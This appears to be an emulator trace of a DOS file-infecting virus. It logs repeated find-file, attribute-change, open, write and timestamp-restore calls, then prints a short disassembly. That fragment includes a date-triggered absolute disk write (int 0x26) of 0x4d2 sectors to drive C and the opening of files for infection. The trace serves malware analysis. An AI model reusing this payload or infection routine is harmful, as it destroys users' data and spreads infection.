2018-12-25T12:22:43.163060384Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.202838025Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.204174215Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.213935294Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.216069517Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.289010016Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.291901651Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.3920614Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.400003191Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.40142495Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.40839578Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.410078915Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.412357785Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.415858229Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.418377446Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.421644677Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.423527406Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.493781554Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.496796073Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.547456913Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.556644033Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.558482364Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.565492935Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.568415959Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.570983385Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.69219084Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.694897086Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.702029883Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.703918989Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.755906318Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.758933797Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x253]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-25T12:22:43.76141094Z 26 PC: 12ab6 | Set disk transfer address